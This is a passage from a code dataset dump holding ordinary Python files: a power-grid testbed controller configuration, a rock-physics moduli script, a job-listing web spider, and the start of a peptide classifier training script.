[L1, L2, L3] to ['A','B','C'] or [L1] to ['B']\n\nFlexlab-specific dictionaries:\n\nacts_to_phase_dict:\nMaps the actuators in the flexlab to phases on the network\nIf some phases are not connected, the empty string '' is placed in the location.\n\nTo account for the fact that the PMU plugs and actuators may be misconnected (a flexlab-specific issue),\nThis code deals with this by using the empty strings '' in acts_to_phase_dict.\nIf an entry is not empty, then the controller controls that actuator.\nThe corresponding pmu reading for that actuator is given using the act_to_plug_Map\n\nact_idxs:\nDetermines which flexlab actuators a given LPBC controls.\nassumes that, for each lpbc with multiple actuators, the actuators are dispatched in A, B, C order\nalso, for each lpbc, there is not more than one actuator on a given phase\n\nactType_dict:\nTells each LPBC whether it sends commands to loads or inverters\n\n'''\n\n\nSPBCname = 'spbc-jasper-1'\n# SPBCname = 'spbc-example-jasper'\n\n#Manual entry here to determine test case, phases, etc.\n#Test Case\n#testcase = '13unb'\ntestcase = '13bal'\n# testcase = '33'\n# testcase = 'PL0001'\n# testcase = 'manual'\n\nacts_to_phase_dict = dict()\nactType_dict = dict()\nif testcase == '13bal':\n testNumber = '3.3'\n lpbcidx = ['675'] #may have to set these manually\n for key in lpbcidx: #makes them all three phase inverters\n acts_to_phase_dict[key] = np.asarray(['A','B','C']) #3 phase default #['A','',''] or ['','C',''] or ['A','B','C','A','B','C'] or ['A','','','A','',''] are also examples, ['A','C','B'] and ['B','B','B'] are not allowed (yet)\n actType_dict[key] = 'inverter' #'inverter' or 'load'\n ORT_max_kVA = 500\n VmagScaling = 1\n inverterScaling = 500/3.3\n loadScaling = 350\n CILscaling = 10 #in VA\n kVbase = np.ones(3)*(4.16/np.sqrt(3))\n kVAbase = np.ones(3)*5000/3\nelif testcase == '13unb':\n # lpbcidx = ['671','680']\n # key = '671'\n # acts_to_phase_dict[key] = np.asarray(['A','B','C']) #phase on the network (in simulation)\n # actType_dict[key] = 'inverter'\n # key = '680'\n # acts_to_phase_dict[key] = np.asarray(['','','C']) #HERE Single phase actuation might cause problems #the nonzero entries correspond to the actuator indices\n # actType_dict[key] = 'load'\n testNumber = '8.1'\n lpbcidx = ['632'] #nodes of actuation\n key = '632'\n acts_to_phase_dict[key] = np.asarray(['A','B','C']) #which phases to actuate for each lpbcidx # INPUT PHASES\n actType_dict[key] = 'inverter' #choose: 'inverter', 'load', or 'modbus'\n ORT_max_kVA = 500\n VmagScaling = 1\n inverterScaling = 500/3.3\n loadScaling = 350\n CILscaling = 10 #in VA\n kVbase = np.ones(3)*(4.16/np.sqrt(3))\n kVAbase = np.ones(3)*5000/3\nelif testcase == '33':\n testNumber = '8.1'\n lpbcidx = ['6'] #for 33\n key = '6'\n acts_to_phase_dict[key] = np.asarray(['A','B','C']) #which phases to actuate for each lpbcidx # INPUT PHASES\n actType_dict[key] = 'inverter' #choose: 'inverter', 'load', or 'modbus'\n ORT_max_kVA = 500\n VmagScaling = 3. 
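The per-phase bases in these test-case blocks all follow one convention: line-to-line kV divided by sqrt(3) for the line-to-neutral voltage base, and the three-phase kVA rating split evenly across the phases. A standalone numeric check of that arithmetic (illustration only, reusing the '13bal' feeder numbers from above):

import numpy as np

kV_LL = 4.16                                 # line-to-line kV (from the '13bal' block above)
kVA_3ph = 5000.0                             # three-phase kVA base (from the '13bal' block above)
kVbase = np.ones(3) * (kV_LL / np.sqrt(3))   # per-phase line-to-neutral kV, ~2.402
kVAbase = np.ones(3) * kVA_3ph / 3           # per-phase kVA, ~1666.7
print(kVbase, kVAbase)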
#this is a hack to get flexlab to work\n inverterScaling = 500/3.3\n loadScaling = 350\n CILscaling = 10 #in VA\n kVbase = np.ones(3)*(12.47/np.sqrt(3))\n kVAbase = np.ones(3)*3000/3\nelif testcase == 'PL0001':\n testNumber = '9.3'\n lpbcidx = ['N_300063911']\n key = 'N_300063911'\n acts_to_phase_dict[key] = np.asarray(['A','B','C']) #which phases to actuate for each lpbcidx # INPUT PHASES\n actType_dict[key] = 'inverter' #choose: 'inverter', 'load', or 'modbus'\n ORT_max_kVA = 1000\n VmagScaling = 12.6/4.16\n inverterScaling = 1000/1\n loadScaling = 350\n CILscaling = 20 #in VA\n kVbase = np.ones(3)*(12.6/np.sqrt(3))\n kVAbase = np.ones(3)*1500/3\nelif testcase == 'manual':\n print('MOVED TESTS TO ACTUAL TEST CASES')\n\n#these should be established once for the FLexlab,\n#they take care of cases where a pmu port does not correspond to the given inverter number\n#eg if pmu123 port 2 is attached to inverter 3 and port 3 is attached to inverter 2 pmu123_act_to_plug_Map = np.asarray([0, 2, 1])\npmu0_phase_to_plug_Map = np.asarray([0, 1, 2]) #this is assumed to be true\npmu123_act_to_plug_Map = np.asarray([0, 1, 2])\n# pmu123P_act_to_plug_Map = np.asarray([0, 1, 2]) #this is assumed to be in the same order as pmu123_act_to_plug_Map\npmu4_act_to_plug_Map = np.asarray([0, 1, 2])\npmu0_plugs_dict = dict()\npmu123_plugs_dict = dict()\npmu123P_plugs_dict = dict()\npmu4_plugs_dict = dict()\n\nplug_to_phase_dict = dict()\n\nfor key in lpbcidx:\n #act_idxs assumes that, for each lpbc with multiple actuators, the actuators are dispatched in A, B, C order\n #also, for each lpbc, there is not more than one actuator on a given phase\n act_idxs = np.nonzero(acts_to_phase_dict[key])[0] #nonzero entries of acts_to_phase_dict[key] are defined as turning on actuators 1, 2, 3, [0] bc np.nonzero() is weird\n nphases = len(act_idxs)\n\n #In case referenec plugs are not in the connected in the correct A,B,C order:\n #Puts pmu0_plugs_dict[key] in A, B, C order, (assuming XBOS wrapper doesnt take care of this on its own)\n #acts_to_phase_dict[key] has the phases that the reference should listen to (not necessarily in order)\n pmu0_plugs_dict[key] = []\n if 'A' in acts_to_phase_dict[key]: #HERE if you wanted to always include the ref meas for phase A you would take out this if statement. 
Would also require changing the logic in phasorV_calc and phasorI_calc.\n pmu0_plugs_dict[key].append(pmu0_phase_to_plug_Map[0]) #if ref needs to listen to A, listen to the PMU plug corresponding to A\n if 'B' in acts_to_phase_dict[key]:\n pmu0_plugs_dict[key].append(pmu0_phase_to_plug_Map[1])\n if 'C' in acts_to_phase_dict[key]:\n pmu0_plugs_dict[key].append(pmu0_phase_to_plug_Map[2])\n pmu0_plugs_dict[key] = np.asarray(pmu0_plugs_dict[key])\n\n #Does not put local pmus measurements in A, B, C order, but does build plug_to_phase_Map\n #assumes PMU123 and PMU123P are connected in the same order (because in real applications you will not have a PMU123P)\n plug_to_phase_dict[key] = np.asarray(['','',''])\n if actType_dict[key] == 'inverter':\n #puts the the correct PMU measurements into pmu123_plugs_dict[key] and pmu123P_plugs_dict[key] in the order in which the actuators appear in acts_to_phase_dict[key]\n pmu123_plugs_dict[key] = []\n pmu123P_plugs_dict[key] = []\n for i in np.arange(3): #actuator i\n if acts_to_phase_dict[key][i] != '': #if this LPBC uses actuator i\n plug = pmu123_act_to_plug_Map[i] #the pmu plug that corresponds to actuator i\n phase = acts_to_phase_dict[key][i]\n plug_to_phase_dict[key][plug] = phase #places the phase for that wave channel in the plug_to_phase mapping that gets sent to the PMUs\n pmu123_plugs_dict[key].append(plug) #places the PMU measurement corresponding to actuator i on the WAVE channel\n pmu123P_plugs_dict[key].append(plug)\n pmu123_plugs_dict[key] = np.asarray(sorted(pmu123_plugs_dict[key])) #orders the PMU channels in 0,1,2 ordering. This is expected by plug_to_phase_dict, which is sorted implicitly when it is built by inserting into [plug] position (then subsequently reduced to an idx)\n pmu123P_plugs_dict[key] = np.asarray(sorted(pmu123P_plugs_dict[key]))\n elif actType_dict[key] == 'load':\n pmu4_plugs_dict[key] = []\n for i in np.arange(3): #actuator i\n if acts_to_phase_dict[key][i] != '': #if this LPBC uses actuator i\n plug = pmu4_act_to_plug_Map[i] #the pmu plug that corresponds to actuator i\n phase = acts_to_phase_dict[key][i]\n plug_to_phase_dict[key][plug] = phase #places the phase for that wave channel in the plug_to_phase mapping that gets sent to the PMUs\n pmu4_plugs_dict[key].append(plug) #places the PMU measurement corresponding to actuator i on the WAVE channe\n pmu4_plugs_dict[key] = np.asarray(sorted(pmu4_plugs_dict[key])) #orders the PMU channels in 0,1,2 ordering. This is expected by plug_to_phase_dict, which is sorted implicitly\n elif actType_dict[key] == 'modbus':\n pmu123P_plugs_dict[key] = []\n for i in np.arange(3): #actuator i\n if acts_to_phase_dict[key][i] != '': #if this LPBC uses actuator i\n plug = pmu123_act_to_plug_Map[i] #the pmu plug that corresponds to actuator i\n phase = acts_to_phase_dict[key][i]\n plug_to_phase_dict[key][plug] = phase #places the phase for that wave channel in the plug_to_phase mapping that gets sent to the PMUs\n pmu123P_plugs_dict[key].append(plug)\n pmu123P_plugs_dict[key] = np.asarray(sorted(pmu123P_plugs_dict[key]))\n#entity corresponds to a given piece of hardware (eg a server), putting multiple entities so that the lpbcs could go on different pieces of hardware\n#these entity files are on the server (Leo)\nentitydict = dict()\nentitydict[0] = 'lpbc_1.ent'\nentitydict[1] = 'lpbc_2.ent'\nentitydict[2] = 'lpbc_3.ent'\nentitydict[3] = 'lpbc_4.ent'\nentitydict[4] = 'lpbc_5.ent'\nentitydict[5] = 'lpbc_6.ent'\n\n\"Make sure phases are in consecutive order in config. 
Voltage first, then current. i.e., L1, L2, I1, I2\"\n'''NOTE: CHANGED PMUS TO CONFIGURE TO CIL TESTING BECAUSE COULD NOT FIGURE OUT HOW TO GET THE PMUS WITHOUT ERROR'''\n#pmu123Channels = np.asarray(['uPMU_123/L1','uPMU_123/L2','uPMU_123/L3','uPMU_4/C1','uPMU_4/C2','uPMU_4/C3'])\npmu123Channels = np.asarray([]) # DONE FOR CIL\n\n#HHERE this is a hack that Leo implemented to avoid the plug mapping\nif testNumber == '3.3' or testNumber == '9.3':\n pmu123PChannels = np.asarray(['uPMU_123P/L1','uPMU_123P/L2','uPMU_123P/L3'])\nelif testNumber == '8.1':\n pmu123PChannels = np.asarray(['uPMU_4/L1','uPMU_4/L2','uPMU_4/L3']) #these also have current channels, but dont need them\nelse:\n error('Not a valid test number yet (determine what pmu123PChannels should be and include it in the if statements)')\n\npmu4Channels = np.asarray(['uPMU_4/L1','uPMU_4/L2','uPMU_4/L3'])\nrefChannels = np.asarray(['uPMU_0/L1','uPMU_0/L2','uPMU_0/L3','uPMU_0/C1','uPMU_0/C2','uPMU_0/C3'])\n\nnlpbc = len(lpbcidx)\n\n#cfg file is used to build each LPBC, this is a template that is modified below for each LPBC\ncfg_file_template = config_from_file('template.toml') #config_from_file defined in XBOSProcess\n\n#CILscaling = Sratio (below):\n# command given will get multiplied by [150] in switch matrix\n# then divided by 15,000 to give a value in kW internally in Flexlab OpalRT (I think)\n# Thus a VA command will be multiplied by 10 (10 = 150/15 = 150/(15000/1000))\n# Sratio divides the network kVA\n# Sratio=10 divides the networkkVAbase by 10, so when the PU power commands are multiplied by kVA base they will implicitly be divided by 10, which cancels out the factor of 10 that the switch matrix scaling contributes.\n\n# loop = asyncio.get_event_loop()\n\nrate = 10\nprint('rate ', rate)\n\nlpbcdict = dict()\nfor lpbcCounter, key in enumerate(lpbcidx):\n #kVbase = np.NaN #should get this from the SPBC so lpbcwrapper doesnt have to run feeder (which requires networkx)\n #kVAbase = subkVAbase #this should also come from SPBC, once it does you can take it out from here\n act_idxs = np.nonzero(acts_to_phase_dict[key])[0]\n nphases = len(act_idxs)\n actType = actType_dict[key]\n plug_to_phase_map = plug_to_phase_dict[key]\n plug_to_phase_idx = plug_to_phase_map[np.nonzero(plug_to_phase_map)]\n cfg = cfg_file_template\n # namespace is the account that controls permissions\n cfg['name'] = key\n cfg['entity'] = entitydict[lpbcCounter] #entity is like a key for each LPBC\n if actType == 'inverter':\n cfg['rate'] = rate\n cfg['local_channels'] = list(pmu123PChannels[pmu123P_plugs_dict[key]])\n #COMMENTED LINE BELOW FOR CIL TESTING\n #cfg['local_channels'] = list(np.concatenate([pmu123PChannels[pmu123P_plugs_dict[key]], pmu123Channels[3 + pmu123_plugs_dict[key]], pmu123Channels[pmu123_plugs_dict[key]]]))\n #takes voltage measurements from PMU123P, current from PMU123, voltage measurements from PMU123P\n cfg['reference_channels'] = list(refChannels[pmu0_plugs_dict[key]]) #assumes current and voltage plugs are connected the same way\n currentMeasExists = True\n '''\n COMMENTED OUT FOR CIL TESTING\n localSratio = inverterScaling\n '''\n localSratio = CILscaling\n\n elif actType == 'load':\n cfg['rate'] = rate\n cfg['local_channels'] = list(pmu4Channels[pmu4_plugs_dict[key]])\n cfg['reference_channels'] = list(refChannels[pmu0_plugs_dict[key]])\n currentMeasExists = False\n localSratio = loadScaling\n elif actType == 'modbus':\n cfg['rate'] = rate\n cfg['local_channels'] = list(pmu123PChannels[pmu123P_plugs_dict[key]])\n 
cfg['reference_channels'] = list(refChannels[pmu0_plugs_dict[key]]) #made these back into lists in case thats how gabes code expects it\n currentMeasExists = False\n localSratio = CILscaling\n else:\n error('actType Error')\n cfg['spbc'] = SPBCname\n timesteplength = cfg['rate']\n cfg['testcase'] = testcase #6/3/20 put this in so the wrapper plotter can use the name to save the plot for a given testcase\n\n #Zest Parameters (from LPBC)\n currentMeasExists = 0 #HHHERE delete this (?)-- set to 0 in order to run Zest in CIL test\n localVratio = 1\n\n # Zeffk_init_mult = .5\n # Zeffk_init_mult = 2\n\n config = configparser.ConfigParser()\n # config.read('KM_Zest_params.cfg', encoding='utf-8-sig')\n config.read('KM_Zest_params.cfg')\n Zeffk_init_mult = float(config.get('parameters','initParam'))\n print('YYYYYYYYYYYYYYYYY Zeffk_init_mult ', Zeffk_init_mult)\n print('YYYYYYYYYYYYYYYYY type(Zeffk_init_mult) ', type(Zeffk_init_mult))\n\n # lpbcdict[key] = Zestwrapper(cfg, key, testcase, nphases, act_idxs, actType, plug_to_phase_idx, timesteplength, currentMeasExists, kVbase, kVAbase, localSratio, localVratio, ORT_max_kVA, VmagScaling, Zeffk_init_mult, loop) #Every LPBC will have its own step that it calls on its own\n lpbcdict[key] = Zestwrapper(cfg, key, testcase, nphases, act_idxs, actType, plug_to_phase_idx, timesteplength, currentMeasExists, kVbase, kVAbase, localSratio, localVratio, ORT_max_kVA, VmagScaling, Zeffk_init_mult) #Every LPBC will have its own step that it calls on its own\n # lpbcdict[key] = Zestwrapper(cfg, key, testcase, nphases, act_idxs, actType, plug_to_phase_idx, timesteplength, currentMeasExists, kVbase, kVAbase, localSratio, localVratio, ORT_max_kVA, VmagScaling) #Every LPBC will have its own step that it calls on its own\n #key is busId, which is the performance node for the LPBC (not necessarily the actuation node)\n\n# loop.run_forever()\n\nrun_loop() #defined in XBOSProcess\n\n\n\n\n'''\nfrom: https://github.com/gtfierro/energise-implementation/blob/master/LPBC/lpbc-example.py\nConfiguration:\n- `namespace`: do not change\n- `wavemq`: address of local wavemq agent\n- `name`: name of the LPBC controller. **This needs to be unique**\n- `entity`: the name of the local file constituting the 'identity' of this process.\n The entity file is what gives this process the permission to interact with other\n resources. File is created by `create_lpbc.sh`\n- `spbc`: the name of the SPBC this LPBC is subscribed to for phasor targets\n- `local_channels`: a list of URIs representing the phasor channels the LPBC\n subscribes to as the local measurement phasors\n- `reference_channels`: a list of URIs representing the phasor channels the LPBC\n subscribes to as reference phasors\n- `rate`: how many seconds between executions of the LPBC (can be fractional, e.g. 
0.5)\n'''\n\n\n\n'''\nmy note of how Gabe's lpbcprocess and xbosprocess code works:\nlpbcwrapper is an LPBCProcess which is an XBOSProcess https://github.com/gtfierro/xboswave/blob/master/python/pyxbos/pyxbos/process.py\nWhich uses the asyncio python library and has a function call_periodic which calls trigger\nLPBCprocess has trigger which calls do_trigger which calls step with local_phasors, reference_phasors and phasor_targets\nProgram runs until program is closed in terminal by the user (so it will keep trying to send commands after the simulation ends)\n\nLPBC process\nbuilt in:\nSubscribing to reference PMU and local PMU (Local PMU shouldnt be a subscription, it should be locally available HERE)\nSubscribing to SPBC target\ncall_periodic, which runs the step function every self.rate seconds.\nThe second and third inputs (local and ref phasors) of step (within lpbc wrapper) are C37 frames\nhttps://github.com/gtfierro/xboswave/blob/master/python/examples/energise/lpbc.py\n(example code is missing reference phasors)\n\n\nfrom: https://github.com/gtfierro/energise-implementation/blob/master/LPBC/lpbc-example.py\n \"\"\"\n Step is called every 'rate' seconds with the following data:\n - local_phasors: a list of lists of phasor data, corresponding to the\n 'local_channels' given in the LPBC configuration. The phasor data will\n contain *all* phasor data received by the LPBC since the last time the\n 'step' function was run. The outer list of local phasor channels is ordered\n the same as the 'local_channels' configuration variable.\n If 'local_channels=[\"L1\",\"L2\"]', then 'local_phasors' will look like\n [\n # data for L1\n [\n {\n \"time\": \"1559231114799996800\",\n \"angle\": 193.30149788923268,\n \"magnitude\": 0.038565948605537415\n },\n {\n \"time\": \"1559231114899996400\",\n \"angle\": 195.50249902851263,\n \"magnitude\": 0.042079225182533264\n }\n ],\n # data for L2\n [\n {\n \"time\": \"1559231114799996800\",\n \"angle\": 193.30149788923268,\n \"magnitude\": 0.038565948605537415\n },\n {\n \"time\": \"1559231114899996400\",\n \"angle\": 195.50249902851263,\n \"magnitude\": 0.042079225182533264\n }\n ],\n ]\n - reference_phasors: a list of lists of phasor data, corresponding to the\n 'reference_channels' given in the LPBC configuration. The phasor data will\n contain *all* phasor data received by the LPBC since the last time the\n 'step' function was run. 
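As a hedged standalone illustration (not part of the original file), one channel's frame list in the structure documented above can be unpacked into numpy arrays as follows; the two sample frames are copied verbatim from the docstring, with 'time' given as a nanosecond-epoch string:

import numpy as np

frames = [
    {"time": "1559231114799996800", "angle": 193.30149788923268, "magnitude": 0.038565948605537415},
    {"time": "1559231114899996400", "angle": 195.50249902851263, "magnitude": 0.042079225182533264},
]
t_sec = np.array([int(f["time"]) for f in frames]) * 1e-9  # nanoseconds -> seconds
ang = np.array([f["angle"] for f in frames])               # degrees
mag = np.array([f["magnitude"] for f in frames])
print(t_sec, ang, mag)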
The outer list of reference phasor channels is ordered\n the same as the 'reference_channels' configuration variable.\n The structure of the 'reference_phasors' is the same structure as 'local_phasors' above.\n - phasor_target: is the most recently received phasor target given by the SPBC.\n The phasor target key is an array of the targets for each phase.\n It is structured as follows:\n {\n 'time': \"1559231114799996800\", # SPBC time in nanoseconds\n 'phasor_targets': [\n {\n 'nodeID': ,\n 'channelName': 'L1',\n 'angle': 196.123,\n 'magnitude': 10.2,\n 'kvbase': {'value': 10},\n },\n {\n 'nodeID': ,\n 'channelName': 'L2',\n 'angle': 196.123,\n 'magnitude': 10.2,\n 'kvbase': {'value': 10},\n },\n ]\n }\n \"\"\"\n'''\n","sub_path":"LPBC/KM_Zestwrapper_CIL.py","file_name":"KM_Zestwrapper_CIL.py","file_ext":"py","file_size_in_byte":135466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"285297437","text":"#!/usr/bin/env python\n# _*_ coding: utf-8 _*_\n\nimport numpy as np\nfrom scipy.optimize import leastsq\nfrom scipy.optimize import fsolve\nimport matplotlib.pyplot as plt\n#Compute the bulk and shear moduli of the dry rock frame\n\"\"\"Consolidated-sandstone elastic moduli after Lee and Pride: Kd = Kma*(1-φ)/(1+α*φ), μd = μma*(1-φ)/(1+1.5α*φ),\nwhere Kd and μd are the bulk and shear moduli of the dry rock frame; Kma and μma are the bulk and shear moduli of the grains;\nφ is the porosity and α is a consolidation parameter describing how well the grains are cemented.\nLee's 2006 revision:\nμd = μma*(1-φ)/(1+γ*α*φ), with γ=(1+2α)/(1+α)\nSo once φ is known, the dry-rock bulk modulus Kd and shear modulus μd follow.\n\"\"\"\n#Dry-rock bulk modulus: kma is the grain bulk modulus, por the porosity, alpha the consolidation parameter.\ndef cal_bulk_modulus(p,alpha):\n kma,por = p\n return kma*(1-por)/(1+alpha*por)\n\n#Dry-rock shear modulus: p is the coefficient list [gma,alpha], where gma is the grain shear modulus, por the porosity, alpha the consolidation parameter.\ndef cal_shear_modulus_Pride(p,por):\n gma,alpha = p\n return gma*(1-por)/(1+1.5*alpha*por)\n\ndef cal_shear_modulus_Lee(p,por):\n gma,alpha = p\n return gma*(1-por)/(1+((1+2*alpha)/(1+alpha))*alpha*por)\n\n#Residual for least-squares fitting: from the local porosity por and a dry-rock modulus Md (bulk or shear), invert for the grain modulus (kma or gma) and the consolidation parameter alpha\ndef error(p,por,Md,func):\n return func(p,por)-Md\n\n\n\n\"\"\"\nCompute the bulk and shear moduli of the rock grains\n\"\"\"\n#Voigt upper bound for a rock made of n minerals\ndef cal_Voigt(f,m):\n#f holds the volume fractions of the n minerals as a numpy.array, e.g. f = np.array([0.1,0.2,0.7]); sum(f) must equal 1.\n#m holds the moduli of the n minerals as a numpy.array, e.g. m = np.array([1,2,3]); bulk or shear moduli both work.\n if sum(f) !=1:\n raise ValueError(\"volume fractions do not sum to 1\")\n else:\n if len(f) != len(m):\n raise ValueError(\"f and m have different lengths\")\n else:\n return sum(f*m)\n\n\n#Reuss lower bound for a rock made of n minerals\ndef cal_Reuss(f,m):\n#f holds the volume fractions of the n minerals as a numpy.array, e.g. f = np.array([1,2,3]); sum(f) must equal 1.\n#m holds the moduli of the n minerals as a numpy.array, e.g. m = np.array([1,2,3]); bulk or shear moduli both work.\n if sum(f) !=1:\n raise ValueError(\"volume fractions do not sum to 1\")\n else:\n if len(f) != len(m):\n raise ValueError(\"f and m have different lengths\")\n else:\n return 1/sum(f/m)\n\n#Voigt-Reuss-Hill average of the grain moduli\ndef cal_Hill(f,m):\n return (cal_Reuss(f,m)+cal_Voigt(f,m))/2\n\n\n\"\"\"\nGassmann's equations\n\"\"\"\ndef Gassmann_p(kd,gd,por,kma,kf,den):\n return np.sqrt((kd+4/3*gd+(1-kd/kma)**2/((1-kd/kma-por)/kma+por/kf))/den)\n\ndef Gassmann_s(gd,den):\n return np.sqrt(gd/den)\n\n\"\"\"\nSelf-consistent approximation (SCA)\n\"\"\"\n\n\"\"\"\nDifferential effective medium (DEM) model\nFrom Berryman 1980\n\"\"\"\n#P and Q geometric factors for an arbitrary aspect ratio\n#oblate spheroids have alpha<1, prolate spheroids have alpha>1\ndef theta(alpha):\n if alpha<1:\n \treturn alpha*(np.arccos(alpha) - alpha*np.sqrt(1.0 - alpha*alpha))/(1.0 - alpha*alpha)**(3.0/2.0)\n elif alpha == 1:\n raise ValueError(\"alpha must not equal 1, please choose a different value\")\n else:\n \treturn alpha*(alpha*np.sqrt(alpha*alpha-1)-np.arccosh(alpha))/(alpha*alpha-1.0)**(3.0/2.0)\n\ndef f(alpha, theta):\n return alpha*alpha*(3.0*theta - 2.0)/(1.0 - alpha*alpha)\n\ndef PQ(km, gm, ki, gi, alpha):\n A = gi/gm - 1.0\n B = (ki/km - gi/gm)/3.0\n R = gm/(km + (4.0/3.0)*gm)\n theta_ = theta(alpha)\n f_ = f(alpha,theta_)\n F1 
= 1.0 + A*(1.5*(f_ + theta_) - R*(1.5*f_ + 2.5*theta_ - 4.0/3.0))\n F2 = 1.0 + A*(1.0 + 1.5*(f_ + theta_) - R*(1.5*f_ + 2.5*theta_)) + B*(3.0 - 4.0*R) + A*(A + 3.0*B)*(1.5 - 2.0*R)*(f_ + theta_ - R*(f_ - theta_ + 2.0*theta_*theta_))\n F3 = 1.0 + A*(1.0 - f_ - 1.5*theta_ + R*(f_ + theta_))\n F4 = 1.0 + (A/4.0)*(f_ + 3.0*theta_ - R*(f_ - theta_))\n F5 = A*(-f_ + R*(f_ + theta_ - 4.0/3.0)) + B*theta_*(3.0 - 4.0*R)\n F6 = 1.0 + A*(1.0 + f_ - R*(f_ + theta_)) + B*(1.0 - theta_)*(3.0 - 4.0*R)\n F7 = 2.0 + (A/4.0)*(3.0*f_ + 9.0*theta_ - R*(3.0*f_ + 5.0*theta_)) + B*theta_*(3.0 - 4.0*R)\n F8 = A*(1.0 - 2.0*R + (f_/2.0)*(R - 1.0) + (theta_/2.0)*(5.0*R - 3.0)) + B*(1.0 - theta_)*(3.0 - 4.0*R)\n F9 = A*((R - 1.0)*f_ - R*theta_) + B*theta_*(3.0 - 4.0*R)\n P = 3.0*F1/F2\n Q = 2.0/F3 + 1.0/F4 + (F4*F5 + F6*F7 - F8*F9)/(F2*F4)\n return P, Q\n\n#DEM bulk modulus of a two-mineral mixture at a given inclusion volume fraction\ndef dem_K(km,gm,ki,gi,alpha,volume):\n p, q = PQ(km,gm,ki,gi,alpha)\n kd = ki+(km-ki)*(1-volume)**p\n return kd\n\n#DEM shear modulus of a two-mineral mixture\ndef dem_G(km,gm,ki,gi,alpha,volume):\n p, q = PQ(km,gm,ki,gi,alpha)\n gd = gi + (gm-gi)*(1-volume)**q\n return gd\n\n# def dem_m_K(km,gm,ki,gi,alpha,)\n\"\"\"\nMain program\n\"\"\"\n\nif __name__=='__main__':\n # mineral = np.array([[2.2,77]]*100)\n KM = np.array([[20]]*100)\n GM = np.array([[45]]*100)\n KI = np.array([[0.0]]*100)\n GI = np.array([[0.0]]*100)\n ALPHA = np.array([[0.01]]*100)\n perc1 = np.linspace(0,0.2,100)\n\n # perc2 = 1-perc1\n # perc = np.array([perc1,perc2]).transpose()\n # z1 = list(map(cal_Reuss,perc,mineral))\n # z2 = list(map(cal_Voigt,perc,mineral))\n K1 = list(map(dem_K,KM,GM,KI,GI,ALPHA,perc1))\n G1 = list(map(dem_G,KM,GM,KI,GI,ALPHA,perc1))\n K2 = list(map(dem_K,np.array(K1),np.array(G1),KI,GI,np.array([[0.15]]*100),perc1))\n G2 = list(map(dem_G,np.array(K1),np.array(G1),KI,GI,np.array([[0.15]]*100),perc1))\n K3 = list(map(dem_K,np.array(K2),np.array(G2),KI,GI,np.array([[0.8]]*100),perc1))\n G3 = list(map(dem_G,np.array(K2),np.array(G2),KI,GI,np.array([[0.8]]*100),perc1))\n fig1, = plt.plot(perc1,G1, 'b', label='G1')\n # fig2, = plt.plot(perc1,z1,'r',label=\"Reuss K\")\n # fig3, = plt.plot(perc1,z2,'g',label=\"Voigt K\")\n fig2, = plt.plot(perc1,G2,'r',label=\"G2\")\n fig3, = plt.plot(perc1,G3,'g',label=\"G3\")\n plt.legend(handles=[fig1,fig2,fig3]) # show the legend\n plt.grid(\"on\")\n plt.show()","sub_path":"python/petrophysics.py","file_name":"petrophysics.py","file_ext":"py","file_size_in_byte":6116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"419546399","text":"# -*- coding: utf-8 -*-\n\"\"\"\n This spider is a UpperRU spider created on top of the ATSSpider\n scrapy crawl upper_ru -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://job.upper.ru/vacancy?position=&region=\"\n\n sample job url:\n http://job.upper.ru/vacancy/634095\n\"\"\"\n\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix\n\n\nclass UpperRU(ATSSpider):\n\n name = \"upper_ru\"\n\n def parse(self, response):\n selector = Selector(response)\n if not self.expected_job_count_set:\n job_count = selector.xpath(\n '//h2[@class=\"finded-total section\"]/text()').extract()\n if job_count:\n self.expected_job_count = job_count[0]\n\n jobs = selector.xpath('//ul[@id=\"yw0\"]/div[@class=\"items\"]/li')\n for job in jobs:\n url = job.xpath('./h4/a/@href').extract()\n if url:\n meta = {\n 
'ref_num': job.xpath('./@id').extract(),\n 'title': job.xpath('./h4/a/text()').extract(),\n 'salary': job.xpath('./h4/text()').extract(),\n 'loc': job.xpath('./span[@class=\"city\"]/text()').extract(),\n }\n yield Request(\n callback=self.parse_job_callback(),\n meta=meta,\n url=urljoin(response.url, url[0])\n )\n\n next_page_url = selector.xpath(\n '//ul[@id=\"yw1\"]/li[@class=\"next\"]/a/@href').extract()\n if next_page_url:\n yield Request(\n callback=self.parse,\n url=urljoin(response.url, next_page_url[0])\n )\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n\n loader.add_xpath('description', '//div[@class=\"desc section\"]')\n loader.add_xpath(\n 'company', '//div[@class=\"employer-logo\"]/h3/a/text()'\n )\n\n loader.add_value(\n 'referencenumber', response.meta.get('ref_num'),\n Prefix('%s-' % self.name)\n )\n loader.add_value('baseSalary', response.meta.get('salary'))\n loader.add_value('location', response.meta.get('loc'))\n loader.add_value('title', response.meta.get('title'))\n loader.add_value('url', response.url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/upper_ru.py","file_name":"upper_ru.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"599699213","text":"import numpy as np\nimport pandas as pd\nfrom Protein_Encoding import PC_6\n\n# import data\nACP_data = PC_6('./data/new/train_test/4db_all_cdhit99_2124.fasta', length=50)\nnon_ACP_data = PC_6('./data/new/train_test/neg_all_2124.fasta', length=50)\n# turn the list into array\nACP_array= np.array(list(ACP_data.values()))\nnon_ACP_array = np.array(list(non_ACP_data.values()))\n\nfeatures = np.concatenate((non_ACP_array,ACP_array),axis=0)\nlabels = np.hstack((np.repeat(0, len(non_ACP_data)),np.repeat(1, len(ACP_data))))\n\n# shuffle numpy array\nidxs = np.arange(features.shape[0])\nnp.random.shuffle(idxs)\nx = features[idxs]\ny = labels[idxs]\n\n\n# training model\nimport tensorflow.keras\nfrom tensorflow.keras.layers import Dense, Dropout\nfrom tensorflow.keras.layers import Embedding\nfrom tensorflow.keras.layers import Input,Flatten,Masking,BatchNormalization\nfrom tensorflow.keras.layers import LSTM,Conv1D, MaxPool1D\nfrom tensorflow.keras import Model\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.regularizers import L1, L2\nimport os\n\n# model architechure\ndef t_m(train_data, train_label, model_name, path = None):\n input_ = Input(shape=(50,6))\n cnn = Conv1D(filters = 64, kernel_size = 